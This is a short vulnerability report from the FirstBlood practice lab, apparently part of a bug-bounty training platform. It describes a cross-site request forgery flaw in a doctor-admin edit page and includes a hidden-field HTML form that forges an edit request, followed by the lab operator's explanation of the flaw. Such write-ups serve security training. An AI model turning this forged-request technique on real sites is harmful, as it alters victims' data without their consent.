FirstBlood-#1014CSRF to edit doctors information
This issue was discovered on FirstBlood v3

On 2022-12-08, properlay Level 7 reported:

Hello, I found CSRF vulnerability to edit doctors information.

To reproduce:

  1. Login your doctor administrator account.

  2. Copy and paste below code in an html file.

        <form method="POST" action="">
            <input type="hidden" name="drid" value="1"/>
            <input type="hidden" name="name" value="attacke"/>
            <input type="hidden" name="bio" value="attacker"/>
            <input type="hidden" name="bookable" value="1"/>
            <input type="hidden" name="csrf" value=""/>
            <input type="submit" value="Submit">
  1. Open it in a browser, you will see doctor Julie's information change.


Can edit doctors information from csrf.

P4 Low

FirstBlood ID: 58
Vulnerability Type: Cross Site Request Forgery

There is a CSRF vulnerability on /drpanel/edit-dr.php via a GET request and lack of token validation. It was intended that a POST request does not work due to no cookies sent on the request (because of SameSite), but to an over sight this cookie was overwritten rendering it useless.

Report Feedback


Creator & Administrator

Congratulations you were the third researcher to discover this!